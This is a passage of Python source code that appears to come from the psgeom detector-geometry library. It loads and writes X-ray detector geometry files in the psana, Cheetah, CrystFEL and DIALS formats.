  if version >= 2:\n            element_type = sensors.Mtrx\n        elif version == 1:\n            element_type = sensors.MtrxV1\n    \n    elif element_name.startswith('JUNGFRAU'):\n        element_type = sensors.JungfrauSegment\n\n    elif element_name.startswith('EPIX10KA'):\n        element_type = sensors.Epix10kaSegment\n\n    return element_type, element_name\n\n\n\ndef load_psana(obj, filename):\n    \"\"\"\n    Load a geometry in psana format.\n    \n    Parameters\n    ----------\n    filename : str\n        The path of the file on disk.\n    \n    Returns\n    -------\n    root : detector.CompoundCamera\n        The CompoundCamera instance\n    \n    References\n    ----------\n    ..[1] https://confluence.slac.stanford.edu/display/PSDM/Detector+Geometry\n    \"\"\"\n    \n    _check_obj(obj)\n    \n    print('Loading: %s' % filename)\n\n    # ---- load information into 2 tables: id_info (names) & trt (data)\n\n    # types/names and id numbers -- unique name is 2 fields\n    id_info = np.genfromtxt(filename, dtype=str, \n                            usecols=(0,1,2,3), autostrip=True)\n    #print(id_info)\n\n    # translation & rotation table (trt)\n    trt = np.genfromtxt(filename, dtype=np.float64, usecols=list(range(4,13)), autostrip=True)\n    assert trt.shape[1] == 9\n    translations = trt[:,0:3]\n    rotations = trt[:,3:6] + trt[:,6:9] # just combine rotations & tilts\n\n    n_rows = len(id_info)\n    assert trt.shape[0] == n_rows, 'name/data rows dont match (%d/%d)' % \\\n        (trt.shape[0], n_rows)\n\n\n    # ---- find the root of the tree, not guaranteed to be the first line\n    possible_root_rows = list(range(n_rows)) # elimination\n\n    for i in range(n_rows):\n        for j in range(n_rows):\n            \n            # check to see if row i is listed as a child anywhere\n            if (id_info[i][0], id_info[i][1]) == (id_info[j][2], id_info[j][3]):\n                \n                # if so, we know row i is not a root\n                #print \"%d is child in row %d\" % (i,j)\n                if i in possible_root_rows:\n                    possible_root_rows.remove(i)\n    \n    \n    # check to make sure we have only a single root\n    if len(possible_root_rows) != 1:\n        raise IOError('Ambiguous tree structure in geometry file. '\n                      '%d roots found.' 
% len(possible_root_rows))\n else:\n root_index = possible_root_rows[0]\n #if id_info[root_index][0] != 'IP':\n # warnings.warn('Root object is not labeled \"IP\".')\n \n\n # ---- traverse tree, adding children / depth frist\n\n def add_to_tree(current_node_index, parent=None):\n \n cni = current_node_index # shorthand\n cid = (id_info[cni][2], id_info[cni][3])\n \n child_indices = []\n for i in range(n_rows):\n if (id_info[i][0], id_info[i][1]) == cid:\n child_indices.append(i)\n #print '%d --> %s' % (cni, child_indices)\n \n\n # > if no children, is a SensorElement\n if len(child_indices) == 0:\n\n # following commented lines deprecated \n # loop up what type of sensor element we have\n #try:\n # typ = sensors.type_map[id_info[cni][2]]\n #except KeyError:\n # raise KeyError('Sensor type: %s not understood.' % id_info[i][2])\n\n typ, name = map_type(id_info[cni][2])\n \n # TJL note to self:\n # this next line could be problematic if we don't restrict\n # the __init__ method of SensorElements.....\n \n curr = typ.from_type(type_name=name,\n id_num=int(id_info[cni][3]),\n parent=parent,\n rotation_angles=rotations[cni], \n translation=translations[cni])\n \n # > else, is a CompoundCamera\n else:\n curr = obj(type_name=id_info[cni][2],\n id_num=int(id_info[cni][3]),\n parent=parent,\n rotation_angles=rotations[cni], \n translation=translations[cni])\n \n for c in child_indices:\n _ = add_to_tree(c, parent=curr)\n \n # we discard all intermediate results, only root is left\n return curr\n \n root_object = add_to_tree(root_index, parent=None)\n\n return root_object\n \n \ndef _mikhail_ordering(list_of_lines):\n \"\"\"\n for legacy! aka, hopefully we can remove this confusing code soon...\n \"\"\"\n \n # ordering we're going for starts with all the sensor elements, followed\n # by the quads, followed by whatever else\n \n # assume that the ordering we're dealing with is depth-first\n \n sensors = []\n quads = []\n other = []\n root = []\n \n for line in list_of_lines:\n if 'QUAD' in line[16:]:\n quads.append(line)\n elif 'SENS' in line[16:]:\n sensors.append(line)\n elif 'root' in line[16:]:\n root.append(line)\n else:\n other.append(line)\n \n ordered_list = sensors + quads + other + root\n \n assert len(ordered_list) == len(list_of_lines)\n for e in list_of_lines:\n assert e in ordered_list\n \n return ordered_list\n \n \n \ndef write_psana(detector, filename, title='geometry'):\n \"\"\"\n Write a geometry in psana format.\n\n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n References\n ----------\n ..[1] https://confluence.slac.stanford.edu/display/PSDM/Detector+Geometry\n \"\"\"\n \n f = open(filename, 'w')\n \n # write a header\n author = getpass.getuser()\n today = datetime.date.today()\n date = '%d-%d-%d' % (today.month, today.day, today.year)\n time = datetime.datetime.now().time().isoformat()\n\n header = \"\"\"\n# TITLE %s\n# AUTHOR %s\n# CALIB_TYPE geometry\n# COMMENT:01 WRITTEN BY USER \n# DATE_TIME %s\\t%s\n# PARAM:01 PARENT - name and version of the parent object\n# PARAM:02 PARENT_IND - index of the parent object\n# PARAM:03 OBJECT - name and version of the object\n# PARAM:04 OBJECT_IND - index of the new object\n# PARAM:05 X0 - x-coordinate [um] of the object origin in the parent frame\n# PARAM:06 Y0 - y-coordinate [um] of the object origin in the parent frame\n# PARAM:07 Z0 - z-coordinate [um] of the object origin in the parent frame\n# PARAM:08 ROT_Z - object design rotation angle [deg] around Z axis of the parent frame\n# PARAM:09 ROT_Y - object 
design rotation angle [deg] around Y axis of the parent frame\n# PARAM:10 ROT_X - object design rotation angle [deg] around X axis of the parent frame\n# PARAM:11 TILT_Z - object tilt angle [deg] around Z axis of the parent frame\n# PARAM:12 TILT_Y - object tilt angle [deg] around Y axis of the parent frame\n# PARAM:13 TILT_X - object tilt angle [deg] around X axis of the parent frame\n# HDR PARENT IND OBJECT IND X0[um] Y0[um] Z0[um] ROT-Z ROT-Y ROT-X TILT-Z TILT-Y TILT-X\n\"\"\" % (title, author, date, time)\n\n f.write(header + '\\n')\n\n lines = [] # container for data lines\n\n fmt_line = '%12s %4d %12s %4d' + ' %12.6f'*9 + '\\n'\n\n dist = detector.xyz.flatten()[2]\n\n # write a line for the root node\n root_data = ['IP', 0, detector.type_name, detector.id] + [0.0]*2 + [dist] + [0.0]*6\n root_line = fmt_line % tuple(root_data)\n \n lines.append(root_line)\n\n # write a line for each child node in the CompoundCamera tree\n def write_children(node):\n \n if hasattr(node, 'children'):\n \n for child in node.children:\n child_data = [node.type_name,\n node.id,\n child.type_name,\n child.id]\n child_data += list(child.translation)\n child_data += list(child.rotation_angles)\n child_data += [0.0]*3\n \n assert len(child_data) == 13\n \n # Set all child z position to 0\n child_data[6] = 0\n\n line = fmt_line % tuple(child_data)\n lines.append(line)\n \n write_children(child)\n\n write_children(detector)\n \n # temporary -- for compatability with legacy code -- todo\n # flip the ordering of the lines so that the sensor elements come first,\n # as a lot of existing code requires this ordering\n for l in _mikhail_ordering(lines):\n f.write(l)\n\n f.close()\n \n return\n \n\n# ---- cheetah -----------------------------------------------------------------\n \n \ndef _cheetah_to_asics(cheetah_image):\n \n new_image = np.zeros((4,16,185,194), dtype=cheetah_image.dtype)\n \n shape = (185, 388)\n \n num_quads = int(cheetah_image.shape[1] / shape[1])\n if cheetah_image.shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_image.shape))\n \n num_twoXones = int(cheetah_image.shape[0] / shape[0])\n if cheetah_image.shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' % str(cheetah_image.shape))\n \n for q in range(num_quads):\n for twoXone in range(num_twoXones):\n \n x_start = 388 * q\n x_stop = 388 * (q+1)\n \n y_start = 185 * twoXone\n y_stop = 185 * (twoXone + 1)\n \n sec1, sec2 = np.hsplit(cheetah_image[y_start:y_stop,\n x_start:x_stop], 2)\n \n new_image[q,twoXone*2,:,:] = sec1\n new_image[q,twoXone*2+1,:,:] = sec2\n \n \n return new_image\n \n \ndef _cheetah_to_twobyones(cheetah_image):\n \n shape = (185, 388)\n \n num_quads = int(cheetah_image.shape[1] / shape[1])\n if cheetah_image.shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_image.shape))\n \n num_twoXones = int(cheetah_image.shape[0] / shape[0])\n if cheetah_image.shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' 
% str(cheetah_image.shape))\n \n new_image = np.zeros((num_quads*num_twoXones,185,388), \n dtype=cheetah_image.dtype)\n \n for q in range(num_quads):\n for twoXone in range(num_twoXones):\n \n x_start = 388 * q\n x_stop = 388 * (q+1)\n \n y_start = 185 * twoXone\n y_stop = 185 * (twoXone + 1)\n \n new_image[q*8 + twoXone,:,:] = cheetah_image[y_start:y_stop,\n x_start:x_stop]\n \n return new_image\n \n \ndef load_cheetah(obj, filename, pixel_size=109.92, element_type=sensors.Mtrx):\n \"\"\"\n Load a geometry in cheetah format.\n \n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n Returns\n -------\n root : camera.Cspad\n The Cspad instance\n \"\"\"\n \n _check_obj(obj)\n\n f = h5py.File(filename, 'r')\n\n if not list(f.keys()) == ['x', 'y', 'z']:\n raise IOError('File: %s is not a valid pixel map, should contain fields'\n ' [\"x\", \"y\", \"z\"] exlusively' % filename)\n\n cheetah_shape = f['x'].shape\n\n # convert m --> um, ends up not mattering tho...\n # also flip the sign of x : cheetah uses +x away from hutch door\n x = -1.0 * _cheetah_to_asics( np.array(f['x']) * 1000000.0 )\n y = _cheetah_to_asics( np.array(f['y']) * 1000000.0 )\n\n # for some reason z is in microns, so leave it\n z = _cheetah_to_asics( np.array(f['z']) )\n\n f.close()\n\n bg = basisgrid.BasisGrid()\n shape = (185, 388) # will always be this for each asic\n \n # find out how many quads/asics we expect based on the size of the maps\n # we need this logic here to deal with both big and 2x2 CSPADs\n num_quads = int(cheetah_shape[1] / shape[1])\n if cheetah_shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_shape))\n \n num_asics = int(cheetah_shape[0] / shape[0]) * 2\n if cheetah_shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' 
% str(cheetah_shape))\n\n # loop over each asic, and convert it into a basis grid\n for i in range(num_quads):\n for j in range(num_asics):\n\n # extract all the corner positions (code ineligant but explicit)\n # corners are numbered 0 -> 4, starting top left and continuing cw\n corners = np.zeros(( 4, 3 ))\n corners[0,:] = ( x[i,j,0,0], y[i,j,0,0], z[i,j,0,0] )\n corners[1,:] = ( x[i,j,0,-1], y[i,j,0,-1], z[i,j,0,-1] )\n corners[2,:] = ( x[i,j,-1,-1], y[i,j,-1,-1], z[i,j,-1,-1] )\n corners[3,:] = ( x[i,j,-1,0], y[i,j,-1,0], z[i,j,-1,0] )\n\n # average the vectors formed by the corners to find f/s vects\n # the fast scan direction is the last index, s is next\n # f points left -> right, s points bottom -> top\n f = (( corners[1,:] - corners[0,:] ) + ( corners[2,:] - corners[3,:] ))\n s = (( corners[3,:] - corners[0,:] ) + ( corners[2,:] - corners[1,:] ))\n\n # make them pixel-size magnitude\n f = f * (pixel_size / np.linalg.norm(f))\n s = s * (pixel_size / np.linalg.norm(s))\n \n # p is just location of 1st pixel in memory, which is our 1st corner\n p = corners[0,:]\n bg.add_grid(p, s, f, shape)\n \n geom_instance = obj.from_basisgrid(bg, element_type=element_type)\n \n return geom_instance\n\n\ndef write_cheetah(detector, filename=\"pixelmap-cheetah-raw.h5\"):\n \"\"\"\n Write a geometry in cheetah format.\n\n Parameters\n ----------\n detector : camera.Cspad\n \n filename : str\n The path of the file on disk.\n \"\"\"\n\n coordinates = ['x', 'y', 'z']\n \n if not hasattr(detector, 'xyz'):\n raise TypeError('passed `detector` object must have an xyz attr')\n\n pp = np.squeeze(detector.xyz)\n if pp.shape == (4, 8, 185, 388, 3):\n num_quads = 4\n num_twoXones = 8\n elif pp.shape == (2, 185, 388, 3):\n num_quads = 1\n num_twoXones = 2\n pp = pp.reshape(1, 2, 185, 388, 3) # dummy quad axis\n else:\n raise ValueError('Geometry does not appear to be a CSPAD. 
xyz '\n 'shape: %s' % str(pp.shape))\n\n # write an h5\n f = h5py.File(filename, 'w')\n\n # iterate over x/y/z\n for xyz in range(len(coordinates)):\n\n cheetah_image = np.zeros((1480, 1552), dtype=np.float32)\n\n # iterate over each 2x1/quad (note switch)\n for q in range(num_quads):\n for a in range(num_twoXones): # which 2x1\n\n x_start = 388 * q\n x_stop = 388 * (q+1)\n\n y_start = 185 * a\n y_stop = 185 * (a + 1)\n\n # if x axis, flip sign\n # unless z axis, convert um --> m ; z-axis in cheetah is in um\n if xyz == 0:\n unit_factor = - 1.0 / 1000000.0\n elif xyz == 1:\n unit_factor = 1.0 / 1000000.0\n elif xyz == 2:\n unit_factor = 1.0\n \n cheetah_image[y_start:y_stop,x_start:x_stop] = unit_factor * pp[q,a,:,:,xyz]\n\n\n f['/%s' % coordinates[xyz]] = cheetah_image\n\n f.close()\n\n return\n \n\n# ---- crystfel --------------------------------------------------------------- \n\ndef load_crystfel(obj, filename, element_type=sensors.Mtrx, verbose=True):\n \"\"\"\n Convert a CrystFEL geom file to a Cspad object.\n \n NOTE ON UNITS: all CrystFEL units are pixel units, except the\n sample-to-detector offset, which is typically in meters.\n \n \n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n Returns\n -------\n root : camera.Cspad\n The Cspad instance\n \"\"\"\n \n _check_obj(obj)\n \n # NOTE ON UNITS: all CrystFEL units are pixel units, except the\n # sample-to-detector offset\n \n if not filename.endswith('.geom'):\n raise IOError('Can only read flat text files with extension `.geom`.'\n ' Got: %s' % filename)\n\n if verbose:\n print(\"Converting geometry in: %s ...\" % filename)\n \n f = open(filename, 'r')\n geom_txt = f.read()\n f.close()\n\n\n bg = basisgrid.BasisGrid()\n\n\n # measure the absolute detector offset\n re_pz_global = re.search(r'\\ncoffset\\s+=\\s+(\\d+.\\d+)', geom_txt) \n if re_pz_global == None:\n print(\"WARNING: Could not find `coffset` field, defaulting z-offset to 0.0\")\n p_z_global = 0.0\n else:\n p_z_global = float(re_pz_global.group(1)) * 1e6 # m --> micron\n if verbose:\n print('Found global z-offset (coffset): %f' % p_z_global)\n\n\n # figure out the pixel size\n re_pixel_size = re.search(r'\\nres\\s+=\\s+(\\d+.\\d+)', geom_txt) \n if re_pixel_size == None:\n pixel_size = None\n else:\n pixel_size = 1e6 / float(re_pixel_size.group(1)) # m --> micron\n if verbose:\n print('Found pixel size (res) [micron]: %f' % pixel_size)\n \n \n # find out which panels we have to look for\n # > try to do this in a general way by looking at the unique set of items\n # > with a corner field \n panels = re.findall(r'(\\S+)/corner', geom_txt)\n panels = _natural_sort(list(set( panels )))\n \n if len(panels) == 0:\n raise IOError('Could not find any panels in file: %s' % filename)\n \n # iterate over each quad / ASIC \n for panel in panels:\n\n if verbose:\n print(\"Reading geometry for: %s\" % panel)\n\n try:\n \n # get pixel size on a per-panel basis\n if pixel_size is None:\n re_pixel_size = re.search(r'%s/res\\s+=\\s+(\\d+.\\d+)' % panel, geom_txt) \n if re_pixel_size == None:\n raise IOError('could not find required `res` field in file')\n else:\n pixel_size = 1e6 / float(re_pixel_size.group(1)) # m -> um\n if verbose:\n print(('Found pixel size for panel %s (res) [micron]: '\n '%f' % (panel, pixel_size)))\n \n\n # match f/s vectors (TODO probably should make this a fxn)\n # fs\n re_fs_x = re.search(r'%s/fs\\s+=.*?((.)?\\d+.\\d+)x' % panel, geom_txt)\n re_fs_y = re.search(r'%s/fs\\s+=.*?((.)?\\d+.\\d+)y' % panel, geom_txt)\n\n if (re_fs_x is 
None) and (re_fs_y is None):\n raise IOError('could not find valid ``%s/fs`` field' % panel)\n\n if re_fs_x is None:\n f_x = 0.0\n else:\n f_x = - float( re_fs_x.group(1) )\n \n if re_fs_y is None:\n f_y = 0.0\n else:\n f_y = float( re_fs_y.group(1) )\n \n f = np.array([f_x, f_y, 0.0])\n f = f * (pixel_size / np.linalg.norm(f))\n \n # ss\n re_ss_x = re.search(r'%s/ss\\s+=.*?((.)?\\d+.\\d+)x' % panel, geom_txt)\n re_ss_y = re.search(r'%s/ss\\s+=.*?((.)?\\d+.\\d+)y' % panel, geom_txt)\n\n if (re_ss_x is None) and (re_ss_y is None):\n raise IOError('could not find valid ``%s/ss`` field' % panel)\n\n if re_ss_x is None:\n s_x = 0.0\n else:\n s_x = - float( re_ss_x.group(1) )\n \n if re_ss_y is None:\n s_y = 0.0\n else:\n s_y = float( re_ss_y.group(1) )\n \n s = np.array([s_x, s_y, 0.0])\n s = s * (pixel_size / np.linalg.norm(s))\n \n \n # min_fs & min_ss\n re_min_fs = re.search(r'%s/min_fs = (\\d+)' % panel, geom_txt)\n re_max_fs = re.search(r'%s/max_fs = (\\d+)' % panel, geom_txt)\n \n re_min_ss = re.search(r'%s/min_ss = (\\d+)' % panel, geom_txt)\n re_max_ss = re.search(r'%s/max_ss = (\\d+)' % panel, geom_txt)\n \n shp = ( np.abs(int(re_max_ss.group(1)) - int(re_min_ss.group(1))) + 1, \n np.abs(int(re_max_fs.group(1)) - int(re_min_fs.group(1))) + 1)\n\n sf_angle = np.degrees( np.arccos( np.dot(s, f) / np.square(pixel_size) ) )\n\n print(panel, sf_angle)\n \n except AttributeError as e:\n print(e)\n raise IOError('Geometry file incomplete -- cant parse one or '\n 'more basis vector fields (ss/fs) for panel: %s' % panel)\n\n # match corner postions, that become the p vector\n # note we have to convert from pixel units to mm\n # and also that CrystFEL measures the corner from the actual\n # *corner*, and not the center of the corner pixel!\n \n # also, remember the s[0] and f[0] have already been x-flipped\n \n try:\n \n re_cx = re.search(r'%s/corner_x\\s+=\\s+((.)?\\d+(.\\d+)?)' % panel, geom_txt)\n p_x = - float( re_cx.group(1) ) * pixel_size + 0.5 * (s[0] + f[0])\n\n re_cy = re.search(r'%s/corner_y\\s+=\\s+((.)?\\d+(.\\d+)?)' % panel, geom_txt)\n p_y = float( re_cy.group(1) ) * pixel_size + 0.5 * (s[1] + f[1])\n \n \n # it's allowed to also have individual z-offsets for\n # each panel, so look for those (CrystFEL units: meters) \n re_cz = re.search(r'%s/coffset\\s+=\\s+((.)?\\d+.\\d+)' % panel, geom_txt)\n if re_cz == None:\n if verbose:\n print('Could not find z data for %s' % panel)\n p_z = p_z_global \n else:\n # add to the global offset\n p_z = p_z_global + float( re_cz.group(1) ) * 1e6 # m --> micron\n\n p = np.array([p_x, p_y, p_z])\n\n except AttributeError as e:\n print(e)\n raise IOError('Geometry file incomplete -- cant parse one or '\n 'more corner fields for panel: %s' % panel)\n\n # finally, add the ASIC to the basis grid\n bg.add_grid(p, s, f, shp)\n\n if verbose:\n print(\" ... successfully converted geometry.\")\n \n geom_instance = obj.from_basisgrid(bg, element_type=element_type)\n \n return geom_instance\n \n\ndef write_generic_crystfel(detector, filename, coffset=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n detector : camera.CompoundAreaCamera\n The detector geometry to write to disk\n \n filname : str\n The name of file to write. Should end in '.geom'\n\n coffset: float\n Detector home position to sample distance in metres. 
\n When coffset is None, coffset is set to detector distance.\n \"\"\"\n \n bg = detector.to_basisgrid()\n \n def get_sign(v):\n if v >= 0:\n s = '+'\n else:\n s = '-'\n return s\n\n with open(filename, 'w') as of:\n \n of.write(\"; This file contains a geometry generated by psgeom\\n\")\n of.write(\"; https://github.com/slaclab/psgeom\\n\")\n \n of.write(generic_header + '\\n')\n \n if 'maskfile' in kwargs: \n of.write('mask_file = ' + str(kwargs['maskfile']) + '\\n')\n of.write('mask = /entry_1/data_1/mask\\n')\n of.write('mask_good = 0x0000\\n')\n of.write('mask_bad = 0xffff\\n')\n else:\n of.write('; mask = /entry_1/data_1/mask\\n')\n of.write('; mask_good = 0x0000\\n')\n of.write('; mask_bad = 0xffff\\n')\n of.write('\\n')\n\n # remember: cheetah data is flattened along the slowest dimension\n # so that (n_elements, slow, fast) --> (n_elements * slow, fast)\n # this final 2d array is called \"the slab\"\n\n grid_index = 0 # count the basisgrid we are on\n ss_slab_pos = 0 # the slow index of \"the slab\"\n\n for leaf_index, leaf in enumerate(detector.leaves):\n\n sp_shape = leaf.subpanel_shape\n for sp_ss_index in range(sp_shape[0]):\n for sp_fs_index in range(sp_shape[1]):\n\n subpanel_index = sp_ss_index * sp_shape[1] + sp_fs_index\n\n p, s, f, sp = bg.get_grid(grid_index)\n panel_name = \"p%da%d\" % (leaf_index, subpanel_index)\n \n # write the basis vectors \n f_sqt = math.sqrt(f[0]**2 + f[1]**2)\n s_sqt = math.sqrt(s[0]**2 + s[1]**2)\n\n pixel_size = f_sqt\n \n of.write(\"%s/fs = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-f[0]/f_sqt), abs(f[0]/f_sqt), \n get_sign( f[1]/f_sqt), abs(f[1]/f_sqt) ))\n of.write(\"%s/ss = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-s[0]/s_sqt), abs(s[0]/s_sqt), \n get_sign( s[1]/s_sqt), abs(s[1]/s_sqt) ))\n of.write(\"%s/res = %.3f\\n\" % (panel_name, 1e6 / pixel_size)) # um --> m\n \n # write the corner positions\n tagcx = \"%s/corner_x\" % panel_name\n tagcy = \"%s/corner_y\" % panel_name\n tagcz = \"%s/coffset\" % panel_name\n \n # CrystFEL measures the corner from the actual *corner*, and not\n # the center of the corner pixel (dont forget to x-flip s[0], f[0])\n \n cx = - float(p[0])/pixel_size + 0.5 * (f[0] + s[0])/pixel_size\n cy = float(p[1])/pixel_size - 0.5 * (f[1] + s[1])/pixel_size\n \n of.write(\"%s = %f\\n\" % (tagcx, cx))\n of.write(\"%s = %f\\n\" % (tagcy, cy))\n\n # the z-axis is in *** meters ***\n if coffset is None:\n dist = float(p[2]) / 1e6\n else:\n dist = coffset\n of.write(\"%s = %f\\n\" % (tagcz, dist))\n\n # combine leaf & slow axes\n # note : sp here is just the shape of the basis grid\n # note : sp_ss_index/sp_fs_index is where we are in the subpanel\n # note : fs/ss indices are INCLUSIVE\n\n of.write(\"%s/min_fs = %d\\n\" % (panel_name, sp[1] * sp_fs_index ))\n of.write(\"%s/max_fs = %d\\n\" % (panel_name, sp[1] * (1 + sp_fs_index) - 1))\n\n # ss_slab_pos is incremented below, outside this loop\n of.write(\"%s/min_ss = %d\\n\" % (panel_name, ss_slab_pos))\n of.write(\"%s/max_ss = %d\\n\" % (panel_name, ss_slab_pos + sp[0] - 1))\n \n # this tells CrystFEL to use this panel\n of.write(\"%s/no_index = 0\\n\" % panel_name)\n \n of.write(\"\\n\") # new line\n\n grid_index += 1\n\n # // end fs for loop\n ss_slab_pos += sp[0]\n\n # // end ss for loop\n # // end leaves for loop\n # // end with open(...) 
statement\n\n    # make sure things add up :)\n    assert grid_index == bg.num_grids, grid_index\n    \n    return\n\n\ndef write_cspad_crystfel(detector, filename, coffset=None, intensity_file_type='cheetah',\n                         pixel_size=109.92, **kwargs):\n    \"\"\"\n    Write a CSPAD geometry to disk in CrystFEL format. Note that some fields\n    will be written but left blank -- these are fields you probably should\n    fill in before performing any computations in CrystFEL, but are information\n    that psgeom has no handle on (e.g. detector gain).\n    \n    Thanks to Rick Kirian & Tom White for assistance with this function.\n    \n    Parameters\n    ----------\n    detector : cspad.CSPad\n        The detector geometry to write to disk\n    \n    filename : str\n        The name of file to write. Should end in '.geom'\n    \n    coffset: float\n        Detector home position to sample distance in metres.\n        When coffset is None, coffset is set to detector distance.\n    \n    Optional Parameters\n    -------------------\n    intensity_file_type : str, {'cheetah'}\n        The kind of file this geometry file will be used with. Necessary to tell\n        CrystFEL how intensity data map onto the detector\n\n    pixel_size : float\n        Pixel size in microns\n\n    maskfile : str\n        Hdf5 filename of a mask used for indexing and integration by CrystFEL.\n    \"\"\"\n    \n    bg = detector.to_basisgrid()\n    \n    def get_sign(v):\n        if v >= 0:\n            s = '+'\n        else:\n            s = '-'\n        return s\n    \n    \n    if intensity_file_type == 'cheetah':\n        \n        # this is complex, so I went the lazy route and copied an\n        # existing file\n        intensity_map = crystfel_cheetah_intensities.split('-')\n        assert len(intensity_map) == 64\n        \n    else:\n        raise ValueError('Cannot write geometries for '\n                         '`intensity_file_type`: %s, only currently '\n                         'have implemented writers for '\n                         '{\"cheetah\"}' % intensity_file_type)\n    \n    \n    \n    with open(filename, 'w') as of:\n        \n        of.write(\"; This file contains a CSPAD geometry generated by psgeom\\n\")\n        of.write(\"; https://github.com/slaclab/psgeom\\n\")\n\n        if coffset is None:\n            of.write(cspad_header_noClen + '\\n')\n        else:\n            of.write(cspad_header + '\\n')\n\n        if 'maskfile' in kwargs: \n            of.write('mask_file = ' + str(kwargs['maskfile']) + '\\n')\n            of.write('mask = /entry_1/data_1/mask\\n')\n            of.write('mask_good = 0x0000\\n')\n            of.write('mask_bad = 0xffff\\n')\n        else:\n            of.write('; mask = /entry_1/data_1/mask\\n')\n            of.write('; mask_good = 0x0000\\n')\n            of.write('; mask_bad = 0xffff\\n')\n\n        of.write(cspad_groups + '\\n')\n        \n        # iterate over each basis grid object\n        # for a full CSPAD, this will be 64 elements\n        # for a 2x2, it will be 4 elements and the \"quad\" will always be 0\n        for grid_index in range(bg.num_grids):\n            \n            asic = grid_index % 16\n            quad = grid_index // 16  # integer division: the panel name needs an int quad index\n            \n            p, s, f, sp = bg.get_grid(grid_index)\n\n            panel_name = \"q%da%d\" % (quad, asic)\n            \n            # tell crystFEL how to read intensity values in a file\n            of.write(intensity_map[grid_index].strip() + '\\n')\n            \n            # write the basis vectors \n            sqt = math.sqrt(f[0]**2 + f[1]**2) \n            of.write(\"%s/fs = %s%fx %s%fy\\n\" % ( panel_name,\n                                                get_sign(-f[0]/sqt), abs(f[0]/sqt), \n                                                get_sign( f[1]/sqt), abs(f[1]/sqt) ))\n            sqt = math.sqrt(s[0]**2 + s[1]**2)\n            of.write(\"%s/ss = %s%fx %s%fy\\n\" % ( panel_name,\n                                                get_sign(-s[0]/sqt), abs(s[0]/sqt), \n                                                get_sign( s[1]/sqt), abs(s[1]/sqt) ))\n            \n            # write the corner positions\n            tagcx = \"%s/corner_x\" % panel_name\n            tagcy = \"%s/corner_y\" % panel_name\n            tagcz = \"%s/coffset\" % panel_name\n            \n            # CrystFEL measures the corner from the actual *corner*, and not\n            # the center of the corner pixel (dont forget to x-flip s[0], f[0])\n            \n            cx = - 
float(p[0])/pixel_size + 0.5 * (f[0] + s[0])/pixel_size\n cy = float(p[1])/pixel_size - 0.5 * (f[1] + s[1])/pixel_size\n \n of.write(\"%s = %f\\n\" % (tagcx, cx))\n of.write(\"%s = %f\\n\" % (tagcy, cy))\n \n # the z-axis is in *** meters ***\n if coffset is None:\n dist = float(p[2]) / 1e6\n else:\n dist = coffset\n of.write(\"%s = %f\\n\" % (tagcz, dist ))\n \n # this tells CrystFEL to use this panel\n of.write(\"%s/no_index = 0\\n\" % panel_name)\n \n of.write(\"\\n\") # new line\n \n return \n\n# ---- DIALS -------------------------------------------------------------------\n\n\ndef load_dials(obj, filename, scale_factor=1000.0):\n \"\"\"\n Load a geometry in DIALS format.\n \n Parameters\n ----------\n obj : camera.CompoundAreaCamera\n An instance of CompoundAreaCamera or a subclass of it\n\n filename : str\n The path of the file on disk.\n\n scale_factor : float\n A factor to scale the units by (to e.g. meet a new convention for units)\n \n Returns\n -------\n obj : variable\n A populated instance of the camera object\n \"\"\"\n\n with open(filename, 'r') as f:\n jo = json.load(f)\n\n d = jo[\"detector\"]\n if len(d) != 1:\n raise NotImplementedError('multiple detectors in json')\n else:\n base = jo[\"detector\"][0]\n\n to_visit = []\n bg_tmp = {}\n\n def get_F(node):\n \n # see Acta Cryst. D (2018). D74, 877-894 eqs (1) & (2)\n\n dx = np.array(node[\"fast_axis\"]) # x = fast\n dy = np.array(node[\"slow_axis\"]) # y = slow\n dn = np.cross(dx, dy) # dn = dx x dy\n d0 = np.array(node[\"origin\"]) \n F = np.array([dx, dy, dn, d0]).T\n F = np.vstack([F, np.array([0, 0, 0, 1])])\n\n return F\n\n def dfs(current_node, cF):\n\n # the geometry file is separated into two parts, first a\n # 'hierarchy' that specifies the translations/rotations\n # and points to a 'panel' index\n #\n # the second part is the 'panels', which are the leaves\n # of the hierarchy, but are located in a different part\n # of the JSON file -- these have one final trans/rot to\n # apply\n\n if \"children\" in list(current_node.keys()):\n for i in range(len(current_node[\"children\"])):\n new_node = (current_node[\"children\"][i],\n np.dot(cF, get_F(current_node)) )\n to_visit.append( new_node )\n\n if \"panel\" in list(current_node.keys()):\n panel_index = current_node[\"panel\"]\n panel = base[\"panels\"][panel_index]\n #print \"adding panel:\", panel_index\n\n px_size = np.array(panel[\"pixel_size\"])\n shp = np.array(panel[\"image_size\"])\n\n pF = get_F(panel)\n final_F = np.dot(cF, pF)\n\n # extract the final (transformed) panel vectors\n p = final_F[:3,3] * scale_factor\n s = final_F[:3,1] * px_size[1] * scale_factor\n f = final_F[:3,0] * px_size[0] * scale_factor\n\n # DIAS convention is +z points from IP to source\n # this is the x-flipped version of our convention\n p[0] *= -1\n s[0] *= -1\n f[0] *= -1\n\n #bg.add_grid(p, s, f, shp)\n bg_tmp[panel_index] = (p, s, f, shp)\n\n if len(to_visit) > 0:\n dfs(*to_visit.pop())\n\n return\n\n dfs(base[\"hierarchy\"], get_F(base[\"hierarchy\"]))\n\n # this code checks to make sure we got all the panels\n # and that they get added in order\n bg = basisgrid.BasisGrid()\n for k in range(max(bg_tmp.keys())+1):\n if k in list(bg_tmp.keys()):\n bg.add_grid(*bg_tmp[k])\n else:\n print('WARNING: panel %d seems to be missing' % k)\n \n geom_instance = obj.from_basisgrid(bg)\n\n return geom_instance\n\n \n# ---- generic text ------------------------------------------------------------\n \n \ndef write_psf_text(detector, filename):\n \"\"\"\n Write a geometry to disk in the 
